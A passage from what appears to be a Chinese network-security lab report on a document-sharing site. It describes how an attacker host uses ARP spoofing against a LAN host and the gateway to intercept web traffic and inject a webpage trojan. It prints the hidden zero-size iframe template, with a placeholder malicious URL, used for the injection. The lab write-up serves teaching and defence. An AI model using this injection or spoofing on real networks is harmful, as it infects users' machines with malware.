ng)接口主機(jī)B的IP外網(wǎng)IP第一個/1.1主機(jī)E的內(nèi)網(wǎng)接口主機(jī)A的MAC地址外網(wǎng)IP主機(jī)B的IP第二個/1.1主機(jī)A的MAC地址主機(jī)B的MAC地址外網(wǎng)IP主機(jī)B的IP查看第二個/1.1的"首部字段〞中是否存在框架代碼,若存在,其內(nèi)容為<iframesrc='網(wǎng)馬地址'width=0height=0></iframe>.根據(jù)上表結(jié)果,描述主機(jī)B訪問網(wǎng)頁時被掛馬的過程黑客主機(jī)對內(nèi)網(wǎng)主機(jī)和網(wǎng)關(guān)同時發(fā)起ARP欺騙,當(dāng)內(nèi)網(wǎng)主機(jī)B訪問外網(wǎng)網(wǎng)頁時,會將黑客主機(jī)當(dāng)成網(wǎng)關(guān),并將請求發(fā)送給黑客主機(jī),黑客主機(jī)再將請求轉(zhuǎn)發(fā)給網(wǎng)關(guān).由于網(wǎng)關(guān)也受到了欺騙,所以會將信息返回給黑客主機(jī),黑客主機(jī)將返回信息插入了惡意代碼之后,再轉(zhuǎn)發(fā)給主機(jī)B,而惡意代碼的內(nèi)容就是一個網(wǎng)頁木馬.3.主機(jī)C抓包嗅探〔1〕主機(jī)C訪問"://主機(jī)F的IP地址〞,是否中馬是.〔3〕表26-3-2主機(jī)C的會話過程表會話源MAC地址目的MAC地址源IP目的IP第一個GET主機(jī)C的MAC地址主機(jī)E的內(nèi)網(wǎng)接口主機(jī)C的IP外網(wǎng)IP第一個/1.1主機(jī)A的MAC地址主機(jī)C的

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論